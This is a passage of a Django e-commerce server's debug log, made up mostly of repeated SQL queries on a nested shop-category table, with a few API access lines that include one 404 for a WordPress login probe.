"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:40:57,448 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:40:57,450 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:40:57,455 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) [18/Dec/2019 13:40:57] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 13:40:57,458 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:40:57,461 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:40:57,463 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:40:57,465 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:40:57,470 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:40:57,473 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:40:57,476 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:40:57,478 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:40:57,481 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:40:57,483 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:40:57,487 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:40:57,490 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:40:57,492 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:40:57,495 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:40:57,498 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:40:57,501 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:40:57,504 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:40:57,506 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:40:57,509 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:40:57,512 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:40:57,516 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:40:57,519 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:40:57,521 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:40:57,524 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:40:57,526 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:40:57,530 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:40:57,534 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:40:57,537 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:40:57,539 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:40:57,542 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:40:57,545 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:40:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 13:41:00,294 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 13:41:00,299 utils 4252 140031747061504 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 13:41:00] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 13:44:57] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:47:22] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [18/Dec/2019 13:48:23] "GET /wp-login.php HTTP/1.0" 404 6458 DEBUG 2019-12-18 13:50:22,303 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:50:22,314 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:50:22,321 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:50:22,325 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:50:22,331 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:50:22,335 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:50:22,339 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:50:22,343 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:50:22,348 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:50:22,354 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:50:22,358 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:50:22,362 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:50:22,366 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:50:22,370 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:50:22,376 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:50:22,380 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:50:22,385 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:50:22,389 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:50:22,393 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:50:22,399 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:50:22,403 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:50:22,407 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:50:22,411 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:50:22,415 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:50:22,420 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:50:22,426 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:50:22,430 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:50:22,434 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:50:22,438 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:50:22,442 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:50:22,448 utils 4252 140031747061504 (0.001) 